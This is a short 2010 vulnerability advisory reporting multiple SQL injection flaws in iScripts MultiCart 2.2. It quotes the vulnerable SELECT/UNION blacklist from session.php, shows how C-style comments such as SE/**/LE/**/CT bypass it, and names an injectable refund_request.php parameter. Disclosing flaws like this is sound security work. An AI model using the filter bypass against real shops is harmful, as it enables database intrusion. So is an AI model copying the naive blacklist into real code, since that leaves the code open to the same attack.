扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability NameiScripts MultiCart Vendorhttp://www.iscripts.com Versions Affected 2.2 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-03-07 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION iScriptsMultiCart2.2 is a unique online shopping cart solutionthatenablesyoutohave one storefront and multiplevendorsfor physical or digital (downloadable) products. II. DESCRIPTION Thesolution adopted to avoid SQL Injection flaws is not appropriate. Thisallowstheexistenceofmany SQL Injection flaws. III. ANALYSIS Summary: A) Multiple SQL Injection A) Multiple SQL Injection Thesolution adoptedconsists in transforming the query string in uppercase andcheckingtheexistenceof the words UNION and SELECT.But using the C-like comments in the query string, it is possible to bypass the filter. Example: SELECT becomes SE/**/LE/**/CT UNIONbecomes UN/**/ION The new strings do not match withthe words in the black list but they are good for MySQL. The following is the affected code (session.php): $mystring = strtoupper($_SERVER['QUERY_STRING']); $server_injec1=strpos($mystring, 'SELECT'); $server_injec2=strpos($mystring, 'UNION'); if (($server_injec1 === false) && ($server_injec2 === false) || ($server_injec1 === '0') && ($server_injec2 === '0')) { ; }//end if else { header('location:index.php'); exit(); } IV. SAMPLE CODE A) Multiple SQL Injection http://site/path/refund_request.php?orderid=SQL V. FIX No Fix. |
体验盒子
